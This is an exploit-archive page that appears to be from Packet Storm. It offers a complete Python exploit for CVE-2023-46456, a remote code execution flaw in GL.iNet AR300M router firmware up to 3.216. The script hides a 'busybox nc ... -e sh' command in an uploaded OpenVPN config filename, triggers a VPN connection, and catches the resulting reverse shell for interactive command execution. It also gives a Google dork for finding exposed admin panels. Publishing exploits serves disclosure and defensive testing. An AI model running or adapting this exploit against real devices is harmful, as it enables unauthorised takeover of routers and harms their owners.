what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GL.iNet AR300M 3.216 Remote Code Execution

GL.iNet AR300M 3.216 Remote Code Execution
Posted Mar 4, 2024
Authored by Michele Di Bonaventura

GL.iNet AR300M versions 3.216 and below suffer from an OpenVPN client related remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2023-46456
SHA-256 | 0bc765cb78e3663fd69f067daec79c26a082e75d184e6d211c3b136d90337022

GL.iNet AR300M 3.216 Remote Code Execution

Change Mirror Download
#!/usr/bin/env python3

# Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar
# Version: 3.216
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46456

import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def generate_random_string():
return ''.join([chr(randint(97, 122)) for x in range(6)])

def add_config_file(url, auth_token, payload):
data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}
try:
r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException:
print('[X] Error while adding configuration file')
return False
return True

def verify_config_file(url, auth_token, payload):
try:
r = requests.get(url, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
if not r.json()['passed'] and payload not in r.json()['passed']:
return False
except requests.exceptions.RequestException:
print('[X] Error while verifying the upload of configuration file')
return False
return True

def add_client(url, auth_token):
postdata = {'description':'RCE_client_{}'.format(generate_random_string())}
try:
r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException:
print('[X] Error while adding OpenVPN client')
return False
return True

def get_client_id(url, auth_token, payload):
try:
r = requests.get(url, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
for conn in r.json()['clients']:
if conn['defaultserver'] == payload:
return conn['id']
print('[X] Error: could not find client ID')
return False
except requests.exceptions.RequestException:
print('[X] Error while retrieving added OpenVPN client ID')
return False

def connect_vpn(url, auth_token, client_id):
sleep(0.25)
postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}
r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)

def cleanup(url, auth_token, client_id):
try:
r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException:
print('[X] Error while cleaning up OpenVPN client')
return False
return True

def get_command_response(s):
res = ''
while True:
try:
resp = s.recv(1).decode('utf-8')
res += resp
except UnicodeDecodeError:
pass
except socket.timeout:
break
return res

def revshell_listen(revshell_ip, revshell_port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)

try:
s.bind((revshell_ip, int(revshell_port)))
s.listen(1)
except Exception as e:
print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
exit(1)

try:
clsock, claddr = s.accept()
clsock.settimeout(2)
if clsock:
print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
res = ''
while True:
command = input('$ ')
clsock.sendall('{}\n'.format(command).encode('utf-8'))
stdout.write(get_command_response(clsock))

except socket.timeout:
print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
s.close()

except KeyboardInterrupt:
print('\n[*] Closing connection')
try:
clsock.close()
except socket.error:
pass
except NameError:
pass
s.close()

def main(base_url, auth_token, revshell_ip, revshell_port):
print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')

payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)
print('[+] Filename payload: "{}"'.format(payload))

print('[*] Uploading crafted OpenVPN config file')
if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):
exit(1)

if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):
exit(1)
print('[+] File uploaded successfully')

print('[*] Adding OpenVPN client')
if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):
exit(1)

client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)
if not client_id:
exit(1)
print('[+] Client ID: ' + client_id)

print('[*] Triggering connection to created OpenVPN client')
Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()

print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
revshell_listen(revshell_ip, revshell_port)

print('[*] Clean-up by removing OpenVPN connection')
if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):
exit(1)

print('[+] Done')

if __name__ == '__main__':
if len(argv) < 5:
print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
exit(1)

main(argv[1], argv[2], argv[3], argv[4])


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close